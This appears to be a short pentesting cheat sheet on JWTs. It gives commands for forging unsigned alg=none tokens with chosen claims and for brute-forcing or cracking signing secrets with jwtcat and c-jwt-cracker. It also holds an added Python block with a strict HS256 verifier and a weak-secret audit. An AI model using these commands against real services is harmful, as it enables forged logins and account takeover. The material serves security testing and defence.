Pentesting JWT tokens

When you encounter a JWT and have checked (for example at JWT.io) whether a secret (password) was used to sign it, do the following:

  1. Create a JWT with the None algorithm and pass the required claims (for example user=Admin)
  2. Try to brute-force the JWT with a wordlist containing common passwords
  3. Try to crack the JWT secret key using c-jwt-cracker

PyJWT

  • Installing: pip install pyjwt
  • Create JWT with None alg: pyjwt --alg=none --key=none encode user=test1 admin=false iat=1564989485 exp=1565075885
  • Create JWT with secret: pyjwt --key=secret encode user=test1 admin=false iat=1564989485 exp=1565075885
  • Check if a secret is valid: pyjwt --key=secret decode "json.web.token"

JWT Bruteforce (using wordlist)

Brute-force JWT tokens (using https://github.com/AresS31/jwtcat): python3 jwtcat.py -t "json.web.token" -w wordlist.txt
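As an added illustration from the verifying side (not part of the original post and not PyJWT's code), the following standard-library Python shows what a correct verifier must do against the tokens produced in steps 1 and 2 above: pin the algorithm so an alg=none token is rejected, and audit a token against a wordlist to flag a weak secret. The sample claims, the secret "secret" and the wordlist are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def build_token(claims: dict, secret: str = "", alg: str = "HS256") -> str:
    """Compact JWT in the form pyjwt emits; alg='none' yields an unsigned token
    (what step 1 above produces) so the verifier can be exercised against it."""
    header = b64url(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = b"" if alg == "none" else hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def verify_hs256(token: str, secret: str) -> dict:
    """Strict verifier: pins HS256 (so alg=none or any other header value is
    rejected) and compares the MAC in constant time. Returns the claims."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":  # never let the token choose the algorithm
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def weak_secret(token: str, wordlist) -> Optional[str]:
    """Audit mirroring step 2: the wordlist entry that verifies the token, else None."""
    for candidate in wordlist:
        try:
            verify_hs256(token, candidate)
            return candidate
        except ValueError:
            continue
    return None


if __name__ == "__main__":
    tok = build_token({"user": "test1", "admin": False}, "secret")  # constructed sample
    print(verify_hs256(tok, "secret"))
    print(weak_secret(tok, ["password", "123456", "secret"]))  # -> 'secret'
```

A real deployment should also check exp/iat and the issuer; this block deliberately isolates the two checks the page's steps exercise.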

JWT Crack

https://github.com/brendan-rius/c-jwt-cracker

brew install openssl

git clone https://github.com/brendan-rius/c-jwt-cracker
cd c-jwt-cracker
make OPENSSL=/usr/local/opt/openssl/include OPENSSL_LIB=-L/usr/local/opt/openssl/lib
./jwtcrack "json.web.token"